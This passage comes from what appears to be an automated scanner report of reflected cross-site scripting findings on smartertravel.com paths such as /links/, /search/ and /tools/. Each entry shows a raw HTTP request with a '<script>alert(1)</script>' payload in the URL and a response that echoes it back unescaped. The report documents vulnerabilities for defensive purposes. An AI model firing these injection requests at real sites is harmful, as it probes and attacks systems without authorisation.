Cookie: s_p1_s_campaign=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; s_p1_s_eVar9=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; STMUL=deleted; at=deleted; entry_time=time; s_sq=%5B%5BB%5D%5D; iploc=Dallas, TX (DFW); s_p1_s_eVar7=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; referrer=kayak_Air_Smarter_Travel_All_Vacation_Ad_2%3A%3A%3A%3A%3A%3A1289680935%3A%3A%3A; s_cc=true; o_prvchan=Compare+Prices+%7C+Vacation+Packages; bbSearches=%7B%22cs%22%3A%7B%22c1%22%3A%22HOU%22%2C%22c2%22%3A%22LAX%22%2C%22ntrv%22%3A%222%22%2C%22d1%22%3A1290664800000%2C%22d2%22%3A1291010400000%7D%2C%22rs%22%3A%7B%22air%22%3A%5B%5D%2C%22hotel%22%3A%5B%5D%2C%22car%22%3A%5B%5D%2C%22vacation%22%3A%5B%5D%2C%22vacation_rental%22%3A%5B%5D%2C%22cruise%22%3A%5B%5D%7D%7D; uu=d6c40be3-84da-4cc9-a10b-88cae49b52fa; STM=d28bbb71a2fabbbf65ecf154e557a7a146fac79699dd60429b912c31af91f8baf8d18d9591999eedcb99df6124593b82dbf052ff9876248d6338409a13832b6c; vid=4cdef8272bcc26.88831616;

Response

HTTP/1.1 404 Not Found
Date: Sun, 14 Nov 2010 00:33:44 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
P3P: policyref="http://www.bookingbuddy.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMo DEVo PSAo PSDo IVAo IVDo CONo OUR DELa OTRa IND COM NAV"
Set-Cookie: STMUL=deleted; expires=Sat, 14-Nov-2009 00:34:08 GMT; path=/; domain=smartertravel.com
Set-Cookie: STMUL=deleted; expires=Sat, 14-Nov-2009 00:34:08 GMT; path=/; domain=.smartertravel.com
Set-Cookie: at=deleted; expires=Sat, 14-Nov-2009 00:34:08 GMT; path=/; domain=.smartertravel.com
Set-Cookie: o_prvchan=404+Error; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 27417

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="h
...[SNIP]...
</strong> http://www.smartertravel.com/last-minuteb9fe0<script>alert(1)</script>5edf07d0475/</p>
...[SNIP]...

2.41. http://www.smartertravel.com/links/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartertravel.com
Path:   /links/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload c157f<script>alert(1)</script>7c87aa60d6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /linksc157f<script>alert(1)</script>7c87aa60d6/ HTTP/1.1
Host: www.smartertravel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_p1_s_campaign=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; s_p1_s_eVar9=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; STMUL=deleted; at=deleted; entry_time=time; s_sq=%5B%5BB%5D%5D; iploc=Dallas, TX (DFW); s_p1_s_eVar7=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; referrer=kayak_Air_Smarter_Travel_All_Vacation_Ad_2%3A%3A%3A%3A%3A%3A1289680935%3A%3A%3A; s_cc=true; o_prvchan=Compare+Prices+%7C+Vacation+Packages; bbSearches=%7B%22cs%22%3A%7B%22c1%22%3A%22HOU%22%2C%22c2%22%3A%22LAX%22%2C%22ntrv%22%3A%222%22%2C%22d1%22%3A1290664800000%2C%22d2%22%3A1291010400000%7D%2C%22rs%22%3A%7B%22air%22%3A%5B%5D%2C%22hotel%22%3A%5B%5D%2C%22car%22%3A%5B%5D%2C%22vacation%22%3A%5B%5D%2C%22vacation_rental%22%3A%5B%5D%2C%22cruise%22%3A%5B%5D%7D%7D; uu=d6c40be3-84da-4cc9-a10b-88cae49b52fa; STM=d28bbb71a2fabbbf65ecf154e557a7a146fac79699dd60429b912c31af91f8baf8d18d9591999eedcb99df6124593b82dbf052ff9876248d6338409a13832b6c; vid=4cdef8272bcc26.88831616;

Response

HTTP/1.1 404 Not Found
Date: Sun, 14 Nov 2010 02:38:37 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
P3P: policyref="http://www.bookingbuddy.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMo DEVo PSAo PSDo IVAo IVDo CONo OUR DELa OTRa IND COM NAV"
Set-Cookie: STMUL=deleted; expires=Sat, 14-Nov-2009 02:38:36 GMT; path=/; domain=smartertravel.com
Set-Cookie: STMUL=deleted; expires=Sat, 14-Nov-2009 02:38:36 GMT; path=/; domain=.smartertravel.com
Set-Cookie: at=deleted; expires=Sat, 14-Nov-2009 02:38:36 GMT; path=/; domain=.smartertravel.com
Set-Cookie: o_prvchan=404+Error; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 27806

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="h
...[SNIP]...
</strong> http://www.smartertravel.com/linksc157f<script>alert(1)</script>7c87aa60d6/</p>
...[SNIP]...

2.42. http://www.smartertravel.com/photo-galleries/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartertravel.com
Path:   /photo-galleries/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 62109<script>alert(1)</script>e8d79fa44d7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /photo-galleries62109<script>alert(1)</script>e8d79fa44d7/ HTTP/1.1
Host: www.smartertravel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_p1_s_campaign=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; s_p1_s_eVar9=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; STMUL=deleted; at=deleted; entry_time=time; s_sq=%5B%5BB%5D%5D; iploc=Dallas, TX (DFW); s_p1_s_eVar7=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; referrer=kayak_Air_Smarter_Travel_All_Vacation_Ad_2%3A%3A%3A%3A%3A%3A1289680935%3A%3A%3A; s_cc=true; o_prvchan=Compare+Prices+%7C+Vacation+Packages; bbSearches=%7B%22cs%22%3A%7B%22c1%22%3A%22HOU%22%2C%22c2%22%3A%22LAX%22%2C%22ntrv%22%3A%222%22%2C%22d1%22%3A1290664800000%2C%22d2%22%3A1291010400000%7D%2C%22rs%22%3A%7B%22air%22%3A%5B%5D%2C%22hotel%22%3A%5B%5D%2C%22car%22%3A%5B%5D%2C%22vacation%22%3A%5B%5D%2C%22vacation_rental%22%3A%5B%5D%2C%22cruise%22%3A%5B%5D%7D%7D; uu=d6c40be3-84da-4cc9-a10b-88cae49b52fa; STM=d28bbb71a2fabbbf65ecf154e557a7a146fac79699dd60429b912c31af91f8baf8d18d9591999eedcb99df6124593b82dbf052ff9876248d6338409a13832b6c; vid=4cdef8272bcc26.88831616;

Response

HTTP/1.1 404 Not Found
Date: Sun, 14 Nov 2010 02:00:27 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
P3P: policyref="http://www.bookingbuddy.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMo DEVo PSAo PSDo IVAo IVDo CONo OUR DELa OTRa IND COM NAV"
Set-Cookie: STMUL=deleted; expires=Sat, 14-Nov-2009 02:00:26 GMT; path=/; domain=smartertravel.com
Set-Cookie: STMUL=deleted; expires=Sat, 14-Nov-2009 02:00:26 GMT; path=/; domain=.smartertravel.com
Set-Cookie: at=deleted; expires=Sat, 14-Nov-2009 02:00:26 GMT; path=/; domain=.smartertravel.com
Set-Cookie: o_prvchan=404+Error; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 27631

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="h
...[SNIP]...
</strong> http://www.smartertravel.com/photo-galleries62109<script>alert(1)</script>e8d79fa44d7/</p>
...[SNIP]...

2.43. http://www.smartertravel.com/search/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartertravel.com
Path:   /search/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 8f775<script>alert(1)</script>2ae071cb215 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /search8f775<script>alert(1)</script>2ae071cb215/ HTTP/1.1
Host: www.smartertravel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_p1_s_campaign=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; s_p1_s_eVar9=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; STMUL=deleted; at=deleted; entry_time=time; s_sq=%5B%5BB%5D%5D; iploc=Dallas, TX (DFW); s_p1_s_eVar7=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; referrer=kayak_Air_Smarter_Travel_All_Vacation_Ad_2%3A%3A%3A%3A%3A%3A1289680935%3A%3A%3A; s_cc=true; o_prvchan=Compare+Prices+%7C+Vacation+Packages; bbSearches=%7B%22cs%22%3A%7B%22c1%22%3A%22HOU%22%2C%22c2%22%3A%22LAX%22%2C%22ntrv%22%3A%222%22%2C%22d1%22%3A1290664800000%2C%22d2%22%3A1291010400000%7D%2C%22rs%22%3A%7B%22air%22%3A%5B%5D%2C%22hotel%22%3A%5B%5D%2C%22car%22%3A%5B%5D%2C%22vacation%22%3A%5B%5D%2C%22vacation_rental%22%3A%5B%5D%2C%22cruise%22%3A%5B%5D%7D%7D; uu=d6c40be3-84da-4cc9-a10b-88cae49b52fa; STM=d28bbb71a2fabbbf65ecf154e557a7a146fac79699dd60429b912c31af91f8baf8d18d9591999eedcb99df6124593b82dbf052ff9876248d6338409a13832b6c; vid=4cdef8272bcc26.88831616;

Response

HTTP/1.1 404 Not Found
Date: Sun, 14 Nov 2010 02:40:04 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
P3P: policyref="http://www.bookingbuddy.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMo DEVo PSAo PSDo IVAo IVDo CONo OUR DELa OTRa IND COM NAV"
Set-Cookie: STMUL=deleted; expires=Sat, 14-Nov-2009 02:40:03 GMT; path=/; domain=smartertravel.com
Set-Cookie: STMUL=deleted; expires=Sat, 14-Nov-2009 02:40:03 GMT; path=/; domain=.smartertravel.com
Set-Cookie: at=deleted; expires=Sat, 14-Nov-2009 02:40:03 GMT; path=/; domain=.smartertravel.com
Set-Cookie: o_prvchan=404+Error; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 27705

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="h
...[SNIP]...
</strong> http://www.smartertravel.com/search8f775<script>alert(1)</script>2ae071cb215/</p>
...[SNIP]...

2.44. http://www.smartertravel.com/senior-travel/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartertravel.com
Path:   /senior-travel/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 72370<script>alert(1)</script>14b939424f7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /senior-travel72370<script>alert(1)</script>14b939424f7/ HTTP/1.1
Host: www.smartertravel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_p1_s_campaign=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; s_p1_s_eVar9=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; STMUL=deleted; at=deleted; entry_time=time; s_sq=%5B%5BB%5D%5D; iploc=Dallas, TX (DFW); s_p1_s_eVar7=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; referrer=kayak_Air_Smarter_Travel_All_Vacation_Ad_2%3A%3A%3A%3A%3A%3A1289680935%3A%3A%3A; s_cc=true; o_prvchan=Compare+Prices+%7C+Vacation+Packages; bbSearches=%7B%22cs%22%3A%7B%22c1%22%3A%22HOU%22%2C%22c2%22%3A%22LAX%22%2C%22ntrv%22%3A%222%22%2C%22d1%22%3A1290664800000%2C%22d2%22%3A1291010400000%7D%2C%22rs%22%3A%7B%22air%22%3A%5B%5D%2C%22hotel%22%3A%5B%5D%2C%22car%22%3A%5B%5D%2C%22vacation%22%3A%5B%5D%2C%22vacation_rental%22%3A%5B%5D%2C%22cruise%22%3A%5B%5D%7D%7D; uu=d6c40be3-84da-4cc9-a10b-88cae49b52fa; STM=d28bbb71a2fabbbf65ecf154e557a7a146fac79699dd60429b912c31af91f8baf8d18d9591999eedcb99df6124593b82dbf052ff9876248d6338409a13832b6c; vid=4cdef8272bcc26.88831616;

Response

HTTP/1.1 404 Not Found
Date: Sun, 14 Nov 2010 02:00:02 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
P3P: policyref="http://www.bookingbuddy.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMo DEVo PSAo PSDo IVAo IVDo CONo OUR DELa OTRa IND COM NAV"
Set-Cookie: STMUL=deleted; expires=Sat, 14-Nov-2009 02:00:01 GMT; path=/; domain=smartertravel.com
Set-Cookie: STMUL=deleted; expires=Sat, 14-Nov-2009 02:00:01 GMT; path=/; domain=.smartertravel.com
Set-Cookie: at=deleted; expires=Sat, 14-Nov-2009 02:00:01 GMT; path=/; domain=.smartertravel.com
Set-Cookie: o_prvchan=404+Error; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 27741

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="h
...[SNIP]...
</strong> http://www.smartertravel.com/senior-travel72370<script>alert(1)</script>14b939424f7/</p>
...[SNIP]...

2.45. http://www.smartertravel.com/specialty/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartertravel.com
Path:   /specialty/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 83861<script>alert(1)</script>ce9057c646a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /specialty83861<script>alert(1)</script>ce9057c646a/ HTTP/1.1
Host: www.smartertravel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_p1_s_campaign=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; s_p1_s_eVar9=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; STMUL=deleted; at=deleted; entry_time=time; s_sq=%5B%5BB%5D%5D; iploc=Dallas, TX (DFW); s_p1_s_eVar7=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; referrer=kayak_Air_Smarter_Travel_All_Vacation_Ad_2%3A%3A%3A%3A%3A%3A1289680935%3A%3A%3A; s_cc=true; o_prvchan=Compare+Prices+%7C+Vacation+Packages; bbSearches=%7B%22cs%22%3A%7B%22c1%22%3A%22HOU%22%2C%22c2%22%3A%22LAX%22%2C%22ntrv%22%3A%222%22%2C%22d1%22%3A1290664800000%2C%22d2%22%3A1291010400000%7D%2C%22rs%22%3A%7B%22air%22%3A%5B%5D%2C%22hotel%22%3A%5B%5D%2C%22car%22%3A%5B%5D%2C%22vacation%22%3A%5B%5D%2C%22vacation_rental%22%3A%5B%5D%2C%22cruise%22%3A%5B%5D%7D%7D; uu=d6c40be3-84da-4cc9-a10b-88cae49b52fa; STM=d28bbb71a2fabbbf65ecf154e557a7a146fac79699dd60429b912c31af91f8baf8d18d9591999eedcb99df6124593b82dbf052ff9876248d6338409a13832b6c; vid=4cdef8272bcc26.88831616;

Response

HTTP/1.1 404 Not Found
Date: Sun, 14 Nov 2010 02:08:45 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
P3P: policyref="http://www.bookingbuddy.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMo DEVo PSAo PSDo IVAo IVDo CONo OUR DELa OTRa IND COM NAV"
Set-Cookie: STMUL=deleted; expires=Sat, 14-Nov-2009 02:08:50 GMT; path=/; domain=smartertravel.com
Set-Cookie: STMUL=deleted; expires=Sat, 14-Nov-2009 02:08:50 GMT; path=/; domain=.smartertravel.com
Set-Cookie: at=deleted; expires=Sat, 14-Nov-2009 02:08:50 GMT; path=/; domain=.smartertravel.com
Set-Cookie: o_prvchan=404+Error; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 27735

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="h
...[SNIP]...
</strong> http://www.smartertravel.com/specialty83861<script>alert(1)</script>ce9057c646a/</p>
...[SNIP]...

2.46. http://www.smartertravel.com/student-travel/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartertravel.com
Path:   /student-travel/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 6cbde<script>alert(1)</script>68dd52afa87 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /student-travel6cbde<script>alert(1)</script>68dd52afa87/ HTTP/1.1
Host: www.smartertravel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_p1_s_campaign=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; s_p1_s_eVar9=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; STMUL=deleted; at=deleted; entry_time=time; s_sq=%5B%5BB%5D%5D; iploc=Dallas, TX (DFW); s_p1_s_eVar7=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; referrer=kayak_Air_Smarter_Travel_All_Vacation_Ad_2%3A%3A%3A%3A%3A%3A1289680935%3A%3A%3A; s_cc=true; o_prvchan=Compare+Prices+%7C+Vacation+Packages; bbSearches=%7B%22cs%22%3A%7B%22c1%22%3A%22HOU%22%2C%22c2%22%3A%22LAX%22%2C%22ntrv%22%3A%222%22%2C%22d1%22%3A1290664800000%2C%22d2%22%3A1291010400000%7D%2C%22rs%22%3A%7B%22air%22%3A%5B%5D%2C%22hotel%22%3A%5B%5D%2C%22car%22%3A%5B%5D%2C%22vacation%22%3A%5B%5D%2C%22vacation_rental%22%3A%5B%5D%2C%22cruise%22%3A%5B%5D%7D%7D; uu=d6c40be3-84da-4cc9-a10b-88cae49b52fa; STM=d28bbb71a2fabbbf65ecf154e557a7a146fac79699dd60429b912c31af91f8baf8d18d9591999eedcb99df6124593b82dbf052ff9876248d6338409a13832b6c; vid=4cdef8272bcc26.88831616;

Response

HTTP/1.1 404 Not Found
Date: Sun, 14 Nov 2010 02:09:48 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
P3P: policyref="http://www.bookingbuddy.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMo DEVo PSAo PSDo IVAo IVDo CONo OUR DELa OTRa IND COM NAV"
Set-Cookie: STMUL=deleted; expires=Sat, 14-Nov-2009 02:09:48 GMT; path=/; domain=smartertravel.com
Set-Cookie: STMUL=deleted; expires=Sat, 14-Nov-2009 02:09:48 GMT; path=/; domain=.smartertravel.com
Set-Cookie: at=deleted; expires=Sat, 14-Nov-2009 02:09:48 GMT; path=/; domain=.smartertravel.com
Set-Cookie: o_prvchan=404+Error; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 27522

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="h
...[SNIP]...
</strong> http://www.smartertravel.com/student-travel6cbde<script>alert(1)</script>68dd52afa87/</p>
...[SNIP]...

2.47. http://www.smartertravel.com/tip-of-the-day/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartertravel.com
Path:   /tip-of-the-day/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload ae2b7<script>alert(1)</script>bc82c728c50 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tip-of-the-dayae2b7<script>alert(1)</script>bc82c728c50/ HTTP/1.1
Host: www.smartertravel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_p1_s_campaign=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; s_p1_s_eVar9=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; STMUL=deleted; at=deleted; entry_time=time; s_sq=%5B%5BB%5D%5D; iploc=Dallas, TX (DFW); s_p1_s_eVar7=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; referrer=kayak_Air_Smarter_Travel_All_Vacation_Ad_2%3A%3A%3A%3A%3A%3A1289680935%3A%3A%3A; s_cc=true; o_prvchan=Compare+Prices+%7C+Vacation+Packages; bbSearches=%7B%22cs%22%3A%7B%22c1%22%3A%22HOU%22%2C%22c2%22%3A%22LAX%22%2C%22ntrv%22%3A%222%22%2C%22d1%22%3A1290664800000%2C%22d2%22%3A1291010400000%7D%2C%22rs%22%3A%7B%22air%22%3A%5B%5D%2C%22hotel%22%3A%5B%5D%2C%22car%22%3A%5B%5D%2C%22vacation%22%3A%5B%5D%2C%22vacation_rental%22%3A%5B%5D%2C%22cruise%22%3A%5B%5D%7D%7D; uu=d6c40be3-84da-4cc9-a10b-88cae49b52fa; STM=d28bbb71a2fabbbf65ecf154e557a7a146fac79699dd60429b912c31af91f8baf8d18d9591999eedcb99df6124593b82dbf052ff9876248d6338409a13832b6c; vid=4cdef8272bcc26.88831616;

Response

HTTP/1.1 404 Not Found
Date: Sun, 14 Nov 2010 02:00:45 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
P3P: policyref="http://www.bookingbuddy.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMo DEVo PSAo PSDo IVAo IVDo CONo OUR DELa OTRa IND COM NAV"
Set-Cookie: STMUL=deleted; expires=Sat, 14-Nov-2009 02:00:44 GMT; path=/; domain=smartertravel.com
Set-Cookie: STMUL=deleted; expires=Sat, 14-Nov-2009 02:00:44 GMT; path=/; domain=.smartertravel.com
Set-Cookie: at=deleted; expires=Sat, 14-Nov-2009 02:00:44 GMT; path=/; domain=.smartertravel.com
Set-Cookie: o_prvchan=404+Error; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 27733

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="h
...[SNIP]...
</strong> http://www.smartertravel.com/tip-of-the-dayae2b7<script>alert(1)</script>bc82c728c50/</p>
...[SNIP]...

2.48. http://www.smartertravel.com/tools/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartertravel.com
Path:   /tools/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload b8156<script>alert(1)</script>1602f6a1fdd was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /toolsb8156<script>alert(1)</script>1602f6a1fdd/ HTTP/1.1
Host: www.smartertravel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_p1_s_campaign=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; s_p1_s_eVar9=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; STMUL=deleted; at=deleted; entry_time=time; s_sq=%5B%5BB%5D%5D; iploc=Dallas, TX (DFW); s_p1_s_eVar7=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; referrer=kayak_Air_Smarter_Travel_All_Vacation_Ad_2%3A%3A%3A%3A%3A%3A1289680935%3A%3A%3A; s_cc=true; o_prvchan=Compare+Prices+%7C+Vacation+Packages; bbSearches=%7B%22cs%22%3A%7B%22c1%22%3A%22HOU%22%2C%22c2%22%3A%22LAX%22%2C%22ntrv%22%3A%222%22%2C%22d1%22%3A1290664800000%2C%22d2%22%3A1291010400000%7D%2C%22rs%22%3A%7B%22air%22%3A%5B%5D%2C%22hotel%22%3A%5B%5D%2C%22car%22%3A%5B%5D%2C%22vacation%22%3A%5B%5D%2C%22vacation_rental%22%3A%5B%5D%2C%22cruise%22%3A%5B%5D%7D%7D; uu=d6c40be3-84da-4cc9-a10b-88cae49b52fa; STM=d28bbb71a2fabbbf65ecf154e557a7a146fac79699dd60429b912c31af91f8baf8d18d9591999eedcb99df6124593b82dbf052ff9876248d6338409a13832b6c; vid=4cdef8272bcc26.88831616;

Response

HTTP/1.1 404 Not Found
Date: Sun, 14 Nov 2010 02:34:19 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
P3P: policyref="http://www.bookingbuddy.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMo DEVo PSAo PSDo IVAo IVDo CONo OUR DELa OTRa IND COM NAV"
Set-Cookie: STMUL=deleted; expires=Sat, 14-Nov-2009 02:35:04 GMT; path=/; domain=smartertravel.com
Set-Cookie: STMUL=deleted; expires=Sat, 14-Nov-2009 02:35:04 GMT; path=/; domain=.smartertravel.com
Set-Cookie: at=deleted; expires=Sat, 14-Nov-2009 02:35:04 GMT; path=/; domain=.smartertravel.com
Set-Cookie: o_prvchan=404+Error; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 27521

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="h
...[SNIP]...
</strong> http://www.smartertravel.com/toolsb8156<script>alert(1)</script>1602f6a1fdd/</p>
...[SNIP]...

2.49. http://www.smartertravel.com/travel-advice/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartertravel.com
Path:   /travel-advice/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 64f8f<script>alert(1)</script>6af7dc60215 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /travel-advice64f8f<script>alert(1)</script>6af7dc60215/ HTTP/1.1
Host: www.smartertravel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_p1_s_campaign=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; s_p1_s_eVar9=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; STMUL=deleted; at=deleted; entry_time=time; s_sq=%5B%5BB%5D%5D; iploc=Dallas, TX (DFW); s_p1_s_eVar7=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; referrer=kayak_Air_Smarter_Travel_All_Vacation_Ad_2%3A%3A%3A%3A%3A%3A1289680935%3A%3A%3A; s_cc=true; o_prvchan=Compare+Prices+%7C+Vacation+Packages; bbSearches=%7B%22cs%22%3A%7B%22c1%22%3A%22HOU%22%2C%22c2%22%3A%22LAX%22%2C%22ntrv%22%3A%222%22%2C%22d1%22%3A1290664800000%2C%22d2%22%3A1291010400000%7D%2C%22rs%22%3A%7B%22air%22%3A%5B%5D%2C%22hotel%22%3A%5B%5D%2C%22car%22%3A%5B%5D%2C%22vacation%22%3A%5B%5D%2C%22vacation_rental%22%3A%5B%5D%2C%22cruise%22%3A%5B%5D%7D%7D; uu=d6c40be3-84da-4cc9-a10b-88cae49b52fa; STM=d28bbb71a2fabbbf65ecf154e557a7a146fac79699dd60429b912c31af91f8baf8d18d9591999eedcb99df6124593b82dbf052ff9876248d6338409a13832b6c; 